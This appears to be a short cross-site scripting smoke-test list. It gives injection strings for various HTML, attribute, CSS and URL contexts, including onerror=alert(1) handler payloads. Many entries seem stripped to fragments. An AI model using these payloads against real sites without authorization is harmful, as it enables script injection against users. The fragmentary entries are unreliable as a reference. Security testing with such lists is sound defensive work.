#
# Really simple XSS smoke test
#
#
# Script Tags
#
# in plain text context - duh
# as attribute
>
# as unquoted value
x >
# as single quoted value
' >
# as double quoted value
">
# inside
red;
# inside
red;}
# inside
# inside CSS URL, e.g. background-image:url('$USERINPUT')
');}
#
# onerror (or on-other)
#
# as attribute
onerror=alert(1)>
# as unquoted value
x onerror=alert(1);>
# as single quoted value
x' onerror=alert(1);>
# as double quoted value
x" onerror=alert(1);>
#
# href-like
#
# duh
# does not work
#
# really a raw embedded null